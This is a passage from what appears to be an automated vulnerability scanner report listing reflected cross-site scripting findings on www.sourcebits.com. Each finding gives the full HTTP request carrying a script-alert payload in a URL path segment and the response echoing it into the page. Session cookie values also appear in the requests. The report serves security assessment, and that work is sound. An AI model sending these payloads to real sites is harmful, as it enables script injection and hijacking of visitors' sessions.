Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:22 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/jquery-ui-1.8.12.custom.min.js664da"><script>alert(1)</script>9cac43cf36b?1305313041" />
...[SNIP]...

1.87. http://www.sourcebits.com/js/jquery.colorbox-min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery.colorbox-min.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23356<script>alert(1)</script>c14ac66b65f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js23356<script>alert(1)</script>c14ac66b65f/jquery.colorbox-min.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/design
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:19 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js23356<script>alert(1)</script>c14ac66b65f/jquery.colorbox-min.js?1265536927</h2>
...[SNIP]...

1.88. http://www.sourcebits.com/js/jquery.colorbox-min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery.colorbox-min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ce3b"><script>alert(1)</script>6524aeb943d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js3ce3b"><script>alert(1)</script>6524aeb943d/jquery.colorbox-min.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/design
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js3ce3b"><script>alert(1)</script>6524aeb943d/jquery.colorbox-min.js?1265536927" />
...[SNIP]...

1.89. http://www.sourcebits.com/js/jquery.colorbox-min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery.colorbox-min.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload df649<script>alert(1)</script>075c9c8a6af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery.colorbox-min.jsdf649<script>alert(1)</script>075c9c8a6af?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/design
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:31 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/jquery.colorbox-min.jsdf649<script>alert(1)</script>075c9c8a6af?1265536927</h2>
...[SNIP]...

1.90. http://www.sourcebits.com/js/jquery.colorbox-min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery.colorbox-min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c614"><script>alert(1)</script>82218e57a1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery.colorbox-min.js5c614"><script>alert(1)</script>82218e57a1d?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/design
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/jquery.colorbox-min.js5c614"><script>alert(1)</script>82218e57a1d?1265536927" />
...[SNIP]...

1.91. http://www.sourcebits.com/js/jquery.easing.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery.easing.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaa03"><script>alert(1)</script>57f6e9e3b41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jseaa03"><script>alert(1)</script>57f6e9e3b41/jquery.easing.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:04 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/jseaa03"><script>alert(1)</script>57f6e9e3b41/jquery.easing.js?1265536927" />
...[SNIP]...

1.92. http://www.sourcebits.com/js/jquery.easing.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery.easing.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 43ef7<script>alert(1)</script>4031793e27a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js43ef7<script>alert(1)</script>4031793e27a/jquery.easing.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:07 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js43ef7<script>alert(1)</script>4031793e27a/jquery.easing.js?1265536927</h2>
...[SNIP]...

1.93. http://www.sourcebits.com/js/jquery.easing.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery.easing.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be6d0<script>alert(1)</script>9764647f121 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery.easing.jsbe6d0<script>alert(1)</script>9764647f121?1265536927 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:19 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/jquery.easing.jsbe6d0<script>alert(1)</script>9764647f121?1265536927</h2>
...[SNIP]...

1.94. http://www.sourcebits.com/js/jquery.easing.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery.easing.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbb39"><script>alert(1)</script>9563b534f36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery.easing.jscbb39"><script>alert(1)</script>9563b534f36?1265536927 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/jquery.easing.jscbb39"><script>alert(1)</script>9563b534f36?1265536927" />
...[SNIP]...

1.95. http://www.sourcebits.com/js/jquery.imgpreload.min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery.imgpreload.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a147"><script>alert(1)</script>f06e504d68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js9a147"><script>alert(1)</script>f06e504d68/jquery.imgpreload.min.js?1305348156 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:13 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js9a147"><script>alert(1)</script>f06e504d68/jquery.imgpreload.min.js?1305348156" />
...[SNIP]...

1.96. http://www.sourcebits.com/js/jquery.imgpreload.min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery.imgpreload.min.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d06f8<script>alert(1)</script>187267bc4e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsd06f8<script>alert(1)</script>187267bc4e3/jquery.imgpreload.min.js?1305348156 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/jsd06f8<script>alert(1)</script>187267bc4e3/jquery.imgpreload.min.js?1305348156</h2>
...[SNIP]...

1.97. http://www.sourcebits.com/js/jquery.imgpreload.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery.imgpreload.min.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23020<script>alert(1)</script>65c996967f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery.imgpreload.min.js23020<script>alert(1)</script>65c996967f7?1305348156 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:32 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/jquery.imgpreload.min.js23020<script>alert(1)</script>65c996967f7?1305348156</h2>
...[SNIP]...

1.98. http://www.sourcebits.com/js/jquery.imgpreload.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery.imgpreload.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51a69"><script>alert(1)</script>0d8c5315efb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery.imgpreload.min.js51a69"><script>alert(1)</script>0d8c5315efb?1305348156 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/jquery.imgpreload.min.js51a69"><script>alert(1)</script>0d8c5315efb?1305348156" />
...[SNIP]...

1.99. http://www.sourcebits.com/js/jquery.livequery.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery.livequery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25d4e"><script>alert(1)</script>ba05c9fe7c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js25d4e"><script>alert(1)</script>ba05c9fe7c8/jquery.livequery.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js25d4e"><script>alert(1)</script>ba05c9fe7c8/jquery.livequery.js?1265536927" />
...[SNIP]...

1.100. http://www.sourcebits.com/js/jquery.livequery.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery.livequery.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 618ef<script>alert(1)</script>21a34de43f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js618ef<script>alert(1)</script>21a34de43f5/jquery.livequery.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:20 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js618ef<script>alert(1)</script>21a34de43f5/jquery.livequery.js?1265536927</h2>
...[SNIP]...

1.101. http://www.sourcebits.com/js/jquery.livequery.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery.livequery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cad07"><script>alert(1)</script>6ede187ab0a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery.livequery.jscad07"><script>alert(1)</script>6ede187ab0a?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
